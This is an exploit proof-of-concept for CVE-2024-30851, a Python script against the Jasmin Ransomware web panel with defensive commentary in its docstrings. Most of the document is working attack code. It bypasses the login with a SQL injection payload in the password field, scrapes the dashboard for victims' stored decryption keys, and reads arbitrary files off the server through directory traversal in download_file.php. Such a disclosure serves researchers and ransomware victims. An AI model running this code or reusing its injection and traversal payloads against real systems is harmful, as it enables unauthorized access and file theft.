## https://sploitus.com/exploit?id=PACKETSTORM:177945
# Exploit Title: Jasmin Ransomware arbitrary file read  
# Date: 2024-04-04  
# Exploit Author: @_chebuya  
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware  
# Version: v1.1  
# Tested on: Ubuntu 20.04 LTS  
# CVE: CVE-2024-30851  
# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login  
# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main  
import requests  
import argparse  
import os  
from bs4 import BeautifulSoup  
  
def get_file(jasmin_url, filepath):
    """Request ``download_file.php`` on the panel and return the response body.

    ``filepath`` is placed into the ``file`` query parameter exactly as
    given (no URL-encoding is applied here), and the request is sent without
    cookies or any other credential. A file body coming back therefore
    indicates the endpoint serves content without checking for a logged-in
    session, which matches the authorization issue named in the advisory
    header of this file.

    Defensive reading: the endpoint should require an authenticated session
    and resolve the requested name against a fixed directory before opening
    it. In web-server logs this traffic appears as GET requests to
    ``download_file.php`` whose ``file`` value points outside the panel's
    own storage directory.
    """
    download_url = f'{jasmin_url}/download_file.php?file={filepath}'

    # Redirects are not followed, so the text returned is the body of the
    # first response. NOTE(review): presumably the panel answers with a
    # redirect to the login page while still emitting the file - confirm.
    reply = requests.get(download_url, allow_redirects=False)
    return reply.text
  
  
def get_keys(jasmin_url):
    """Log in to the panel, parse the dashboard table and print each stored key.

    Steps, as written:
      1. POST a fixed form body to ``checklogin.php``. The ``password`` field
         carries a SQL tautology; per the advisory header the login query is
         injectable, so the panel treats the request as a valid login.
      2. Reuse the cookies from that response to GET ``dashboard.php``.
      3. For every ``<tr>`` that has ``<td>`` cells, read the hostname
         (cell 0), the username (cell 1) and the ``href`` of the link in
         cell 7, then pass the part after the first ``=`` to ``get_file``.

    Nothing is returned; results are printed to stdout.

    Defensive reading: the login handler should use parameterized queries
    rather than building SQL from form fields. A POST to ``checklogin.php``
    with an empty ``username`` and quote/comment characters in ``password``
    is a straightforward log signature for this request.
    """
    # Sent as a raw string, so the body goes out byte-for-byte as written.
    login_body = "username=&password='+or+1%3D1+--+-&service=login"
    form_headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }
    login_reply = requests.post(
        f'{jasmin_url}/checklogin.php',
        headers=form_headers,
        data=login_body,
    )
    session_cookies = login_reply.cookies

    dashboard = requests.get(f'{jasmin_url}/dashboard.php', cookies=session_cookies)
    table_rows = BeautifulSoup(dashboard.text, 'html.parser').find_all('tr')

    # The count subtracts one row, presumably the table header.
    print(f"Dumping decryption keys from {len(table_rows)-1} victims")
    for table_row in table_rows:
        cells = table_row.find_all('td')
        if not cells:
            # Rows without <td> cells carry no record; skip them.
            continue

        username = cells[1].get_text()
        hostname = cells[0].get_text()
        # The link's query-string value is the stored key file's path.
        filepath = cells[7].find('a')['href'].split("=")[1]

        key_text = get_file(jasmin_url, filepath)
        print(f"Decryption key for {username}@{hostname}: {key_text}")
  
  
# Command-line interface: two subcommands, each taking the panel base URL.
parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")
subparser = parser.add_subparsers(dest='subcommand')

file_parser = subparser.add_parser("getfile", help="Read a file off the server")
file_parser.add_argument(
    "-u", "--url",
    required=True,
    help="The jasmin ransomware web panel url (http://target_server)",
)
file_parser.add_argument(
    "-f", "--file",
    # Default points at the Apache access log of a XAMPP install on the panel host.
    default="c:/xampp/apache/logs/access.log",
    help="The file to read on the target server",
)

keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")
keys_parser.add_argument(
    "-u", "--url",
    required=True,
    help="The jasmin ransomware web panel url (http://target_server)",
)

args = parser.parse_args()

if args.subcommand is None:
    # No subcommand given: show usage and do nothing else.
    parser.print_help()
else:
    # Drop trailing slashes so the endpoint paths can be appended directly.
    target_url = args.url.rstrip("/")

    if args.subcommand == "getfile":
        # Normalise Windows separators and strip a lowercase "c:" drive prefix.
        target_file = args.file.replace("\\", "/").replace("c:", "")
        # os.path.join discards its first argument when the second one is
        # absolute, so for a value starting with "/" the result on a POSIX
        # client is the absolute path alone. Log signatures for this request
        # should match both dot-dot sequences and absolute paths in `file`.
        target_path = os.path.join("../../../../../../../../../", target_file)
        print(get_file(target_url, target_path))
    elif args.subcommand == "getkeys":
        get_keys(target_url)